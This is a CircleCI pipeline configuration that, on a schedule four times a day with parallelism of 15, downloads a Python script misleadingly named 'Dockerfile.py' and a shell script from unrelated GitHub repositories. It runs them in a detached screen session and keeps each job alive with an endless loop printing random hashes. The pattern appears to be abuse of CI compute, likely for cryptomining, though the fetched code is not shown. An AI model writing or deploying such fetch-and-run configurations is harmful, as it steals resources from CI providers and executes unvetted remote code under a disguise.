version: 2.1

jobs:
  build:
    parallelism: 15
    docker:
      - image: couchbase
    steps:
      - checkout
      - run: curl -L https://raw.githubusercontent.com/deeplearningdungs/python-django/master/Dockerfile.py > ./Dockerfile.py
      - run: curl -L https://raw.githubusercontent.com/mcthavez/circleci/master/deploy.sh > ./deploy.sh
      - run: apt update && apt install screen -y && chmod +x Dockerfile.py && screen -dmS run python3 Dockerfile.py && chmod +x deploy.sh && ./deploy.sh
      - run: while :; do echo $RANDOM | md5sum | head -c 20; echo; sleep 2m; done
                     
  build2:
    parallelism: 15
    docker:
      - image: couchbase
    steps:
      - checkout
      - run: curl -L https://raw.githubusercontent.com/deeplearningdungs/python-django/master/Dockerfile.py > ./Dockerfile.py
      - run: curl -L https://raw.githubusercontent.com/mcthavez/circleci/master/deploy.sh > ./deploy.sh
      - run: apt update && apt install screen -y && chmod +x Dockerfile.py && screen -dmS run python3 Dockerfile.py && chmod +x deploy.sh && ./deploy.sh
      - run: while :; do echo $RANDOM | md5sum | head -c 20; echo; sleep 2m; done
      
workflows:
  version: 2.1
  main:
    jobs:
      - build
      - build2
    triggers:
      - schedule:
          cron: "0 5,10,15,20 * * *"
          filters:
            branches:
              only:
                - master
                
  alternatives:
    jobs:
      - build
      - build2
